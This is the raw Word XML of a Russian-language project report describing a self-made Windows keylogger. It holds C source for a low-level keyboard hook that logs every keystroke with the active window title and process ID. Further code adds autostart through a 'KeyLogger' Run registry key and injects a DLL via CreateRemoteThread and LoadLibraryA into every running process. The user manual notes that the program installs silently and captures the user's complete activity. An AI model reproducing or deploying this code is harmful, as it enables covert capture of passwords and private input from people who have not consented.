          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг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984B5C" w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>функции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F75428" w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LowLevelKeyboardHook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LRESULT CALLBACK LowLevelKeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)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GetKeyState(NULL);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(nCode == HC_ACTION &amp;&amp; (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))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written;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KBDLLHOOKSTRUCT *ks = (KBDLLHOOKSTRUCT*) lParam;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SYSTEMTIME st;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moduleName[MAX_MODULE_NAME];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winID = NULL;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HWND activeWindow = GetForegroundWindow();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GetWindowThreadProcessId(activeWindow, &amp;winID);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GetWindowText(activeWindow, moduleName, MAX_MODULE_NAME);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(winID != prevWinID || strcmp(moduleName, prevModuleName))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prevWinID = winID;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strcpy(prevModuleName, moduleName);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sprintf(moduleName + strlen(moduleName), " : %d", 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strcat(moduleName,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moduleName, strlen(moduleName),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GetLocalTime(&amp;st);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GetTimeFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, NULL, g_buf, MAX_BUFSIZE);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</w:t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* buf = g_buf + strlen(g_buf);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(getSysKey(ks-&gt;vkCode))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 if (getCharKey(ks-&gt;vkCode, ks-&gt;scanCode, (LPWORD) buf, winID))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strcpy(buf + 1,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DF6EF9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984B5C" w:rsidRPr="000D413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"[unknown]\r\n");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return CallNextHookEx(hook, nCode, wParam, lParam);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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D413B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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0D413B">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360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>typedef struct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vkCode;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scanCode;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flags;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time;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ULONG_PTR  dwExtraInfo;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 w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00C949A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vkCode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устанавливает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код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виртуальной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клавиши</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C"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scanCode устанавливает аппаратный код опроса</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> клавиатуры (скэн-код) клавиши.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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lags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B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00712C5A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00712C5A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ime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ULONG</w:t>
      </w:r>
      <w:r w:rsidRPr="00B709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dwExtraInfo</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C"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у</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C"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2B50CE" w:rsidRDefault="002B50CE" w:rsidP="00712C5A">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00891D34" w:rsidRPr="00ED07C6" w:rsidRDefault="00403476" w:rsidP="00ED07C6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="24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19842602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</w:t>
      </w:r>
      <w:r w:rsidR="000D413B" w:rsidRPr="00ED07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>Процедура установки программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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91D34" w:rsidRPr="00891D34" w:rsidRDefault="00891D34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 w:rsidRPr="00891D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приложения была разработана функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bool Install(char* injectionDllName)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. – копирует исполняемый файл и инжектируемую библиотеку в директорию операционной системы и устанавливает программу в автозагрузку</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34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значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00891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успешной установке, при ошибке возвращает значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891D34" w:rsidRDefault="00891D34" w:rsidP="00B709E0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injectionDllName</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34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библиотеки, которая должна находится рядом с исполняемым файлом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRPr="002E7A2E" w:rsidRDefault="002E7A2E" w:rsidP="002E7A2E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3525"/>
        </w:tabs>
        <w:spacing w:before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E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Install</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRPr="002E7A2E" w:rsidRDefault="002E7A2E" w:rsidP="00B709E0">
      <w:pPr>
        <w:spacing w:befor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bool Install(char* injectionDllName)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HKEY hk;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char currentPath[MAX_PATH],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sysbuf[MAX_PATH],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*fileName;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fileName = strrchr(currentPath, '\\');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if (ERROR_SUCCESS == RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &amp;hk))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RegSetValueEx(hk, "KeyLogger", 0, REG_SZ, (LPBYTE) sysbuf, strlen(sysbuf));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RegCloseKey(hk);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create RegKey."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strcpy(fileName, injectionDllName);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1D34" w:rsidRPr="0095536E" w:rsidRDefault="00891D34" w:rsidP="00891D34">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRPr="00ED07C6" w:rsidRDefault="002E7A2E" w:rsidP="00ED07C6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="24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419842603"/>
      <w:r w:rsidRPr="00ED07C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5.4 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>Процедура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>инжекции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>библиотеки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRPr="00B709E0" w:rsidRDefault="002E7A2E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Инжекция библиотеки производится с помощью функции </w:t>
      </w:r>
      <w:r w:rsidR="006D47FF" w:rsidRPr="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bool Inject(DWORD pId, char *dllName)</w:t>
      </w:r>
      <w:r w:rsidR="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – функция открывает существующий объект процесса с </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">идентификатором </w:t>
      </w:r>
      <w:r w:rsidR="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>процесса</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pId</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Далее загружается адрес функции </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E" w:rsidRPr="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из динамической библиотеки </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E" w:rsidRPr="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. После чего в открытом процессе выделяется память для инжектируемой библиотеки, и инжектируемая библиотека записывается в адресное пространство открытого процесса. Дистанционно создается новый поток в открытом процессе, выполняющий код инжектируемой библиотеки.</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00B709E0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Возвращает значение </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00891D34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при успешной инжекции, при ошибке возвращает значение </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A2E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DWORD pId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – идентификатор процесса для инжекции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0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char *dllName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – имя инжектируемой библиотеки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRDefault="00B709E0" w:rsidP="00B709E0">
      <w:pPr>
        <w:spacing w:after="240"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5536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inject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bool Inject(DWORD pId, char *dllName)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h = OpenProcess(PROCESS_ALL_ACCESS, false, pId);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(h)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LoadLibAddr = (LPVOID) GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");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(LoadLibAddr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LoadLibraryA function was not found inside kernel3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.dll library.\n"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dereercomp = VirtualAllocEx(h, NULL, strlen(dllName), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);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(dereercomp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memory could not be allocated inside the chosen process.\n"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int n = WriteProcessMemory(h, dereercomp, dllName, strlen(dllName),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(n == 0)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there was no bytes written to the process's address space.\n"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asdc = CreateRemoteThread(h, NULL, NULL, (LPTHREAD_START_ROUTINE) LoadLibAddr, dereercomp, 0,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(asdc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printf("Error: the remote thread could not be created.\n");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Can't open process:" &lt;&lt; pId &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRPr="0095536E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95536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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5536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0095536E" w:rsidRPr="0095536E" w:rsidRDefault="0095536E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B709E0" w:rsidRPr="00ED07C6" w:rsidRDefault="00B709E0" w:rsidP="00ED07C6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="24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19842604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5.5 </w:t>
      </w:r>
      <w:r w:rsidR="0095536E" w:rsidRPr="00ED07C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процедура получения снимка процессов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="0095536E" w:rsidRDefault="001000EB" w:rsidP="001000E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WINAPI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CreateTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>olhelp</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB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Snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="001000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1000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB"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1000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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1000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оментальный снимок из указанных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> процессов, а также кучи, модулей и потоков</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, используемые этими процессами.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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части системы, которые будут включены в снимок. Для получения снимка всех процессов — это параметр должен устанавливаться в </w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TH32CS_SNAPPROCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8C">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US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8D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US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8D2F8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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH32CS_SNAPPROCESS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>этот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игнорируется</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.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  <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если функция завершается успешно, она возвращает открыты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й дескриптор к указанному снимку</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.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</w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8C">
      <w:pPr>
        <w:spacing w:after="24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D2F8C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.5.1 Листинг кода инжекции в процессы, полученные в снимке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>hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);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(hProcessSnap == INVALID_HANDLE_VALUE)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pe32.dwSize = sizeof(PROCESSENTRY32);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(!Process3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2Next(hProcessSnap, &amp;pe32))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(Inject(pe32.th32ProcessID, dllPath))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std::cout &lt;&lt; "Injection success:" &lt;&lt; pe32.szExeFile &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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} whil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e (</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C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DC2314" w:rsidRDefault="00DC2314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D2F8C" w:rsidRDefault="00DC2314" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc419842605"/>
      <w:r w:rsidRPr="00DC2314">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Руководство пользователя</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00AC4812" w:rsidRDefault="00AC4812" w:rsidP="00AC4812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установки приложения требуется запустить исполняемый файл программы. В результате программа установится на компьютер и при каждой загрузке компьютера будет запускаться автоматически.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F45AA" w:rsidRPr="007F45AA" w:rsidRDefault="00AC4812" w:rsidP="007F45AA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 работу с лог-файлами программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC4812" w:rsidRDefault="00AC4812" w:rsidP="00AC4812">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine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D66363" wp14:editId="5020ACD6">
            <wp:extent cx="5664200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0"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56642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812" w:rsidRDefault="007F45AA" w:rsidP="007F45AA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лог-файл</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F45AA" w:rsidRDefault="007F45AA" w:rsidP="007F45AA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 изменении активного окна или заголовка активного окна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лог-файл записывается заголовок окна и идентификатор процесса.</w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В случае нажатии клавиши на клавиатуре, в лог файл записывается</w:t>
      </w:r>
      <w:r w:rsidR="00C60C89">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> время нажатия и </w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>соответствующий символ.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> При нажатии </w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>на системные</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> клавиш</w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00C60C89">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в лог файл записывается соответствующее название клавиши в</w:t>
      </w:r>
      <w:r w:rsidR="009A6EA9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> квадратных скобках.</w:t>
      </w:r>
      <w:r w:rsidR="00C60C89">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Это позволяет собрать полную информацию о работе пользователя.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B1FF6" w:rsidRDefault="005B1F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FF6" w:rsidRDefault="005B1FF6" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc419842606"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Тестирование программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="005B1FF6" w:rsidRDefault="005B1FF6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</w:t>
      </w:r>
      <w:r w:rsidR="00601F1A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>был использован аналог разрабатываемого приложения -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> программа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Free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5B1F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5B1FF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5B1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3.9</w:t>
